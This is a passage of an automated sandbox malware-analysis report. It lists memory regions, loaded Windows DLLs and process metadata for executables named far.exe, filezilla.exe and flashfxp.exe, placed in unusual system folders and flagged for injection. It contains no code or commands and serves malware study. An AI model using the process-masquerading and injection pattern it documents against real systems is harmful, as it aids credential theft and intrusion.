0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2757 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 2758 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 2759 start_va = 0xc20000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 2760 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 2761 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2762 start_va = 0x2210000 end_va = 0x2bd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002210000" filename = "" Region: id = 2763 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2764 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2765 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2766 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2767 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2768 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2769 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2770 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2771 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2772 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2773 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2774 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2775 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2776 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2777 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2778 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2779 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2780 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2781 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2782 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2783 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2784 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2785 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2786 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2787 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2788 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2790 start_va = 0x2be0000 end_va = 0x2ceefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002be0000" filename = "" Thread: id = 130 os_tid = 0x11e0 Process: id = "32" image_name = "far.exe" filename = "c:\\program files\\uninstall information\\far.exe" page_root = "0x5efce000" os_pid = "0x11e4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\Uninstall Information\\far.exe\" " cur_dir = "C:\\Program Files\\Uninstall Information\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2791 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2792 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2793 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2794 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2795 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2796 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2797 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2798 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2799 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2800 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2801 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2802 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2803 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2804 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2805 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2806 start_va = 0x520000 end_va = 0x5ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2807 start_va = 0x720000 end_va = 0x8a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 2808 start_va = 0x8b0000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 2809 start_va = 0xa40000 end_va = 0xafbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 2810 start_va = 0xb90000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 2811 start_va = 0xe50000 end_va = 0xe66fff monitored = 0 entry_point = 0xe514a1 region_type = mapped_file name = "far.exe" filename = "\\Program Files\\Uninstall Information\\far.exe" (normalized: "c:\\program files\\uninstall information\\far.exe") Region: id = 2812 start_va = 0xe70000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 2813 start_va = 0x2270000 end_va = 0x2c33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002270000" filename = "" Region: id = 2814 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2815 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2816 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2817 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2818 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2819 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2820 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2821 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2822 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2823 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2824 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2825 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2826 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2827 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2828 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2829 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2830 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2831 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2832 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2833 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2834 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2835 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2836 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2837 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2838 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2839 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2842 start_va = 0xba0000 end_va = 0xce4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Thread: id = 131 os_tid = 0x11e8 Process: id = "33" image_name = "filezilla.exe" filename = "c:\\program files (x86)\\windows multimedia platform\\filezilla.exe" page_root = "0x5e7d8000" os_pid = "0x11ec" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\filezilla.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Multimedia Platform\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2843 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2844 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2845 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2846 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2847 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2848 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2849 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2850 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2851 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2852 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2853 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2854 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2855 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2856 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2857 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2858 start_va = 0x750000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 2859 start_va = 0x850000 end_va = 0x9d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 2860 start_va = 0x9e0000 end_va = 0xb60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 2861 start_va = 0xb70000 end_va = 0xc2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 2862 start_va = 0xc70000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 2863 start_va = 0xe40000 end_va = 0xe56fff monitored = 0 entry_point = 0xe414a1 region_type = mapped_file name = "filezilla.exe" filename = "\\Program Files (x86)\\Windows Multimedia Platform\\filezilla.exe" (normalized: "c:\\program files (x86)\\windows multimedia platform\\filezilla.exe") Region: id = 2864 start_va = 0xe60000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 2865 start_va = 0x2260000 end_va = 0x2c23fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002260000" filename = "" Region: id = 2866 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2867 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2868 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2869 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2870 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2871 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2872 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2873 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2874 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2875 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2876 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2877 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2878 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2879 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2880 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2881 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2882 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2883 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2884 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2885 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2886 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2887 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2888 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2889 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2890 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2891 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2893 start_va = 0x600000 end_va = 0x711fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Thread: id = 132 os_tid = 0x11f0 Process: id = "34" image_name = "flashfxp.exe" filename = "c:\\program files (x86)\\windows portable devices\\flashfxp.exe" page_root = "0x5fee4000" os_pid = "0x11f4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" 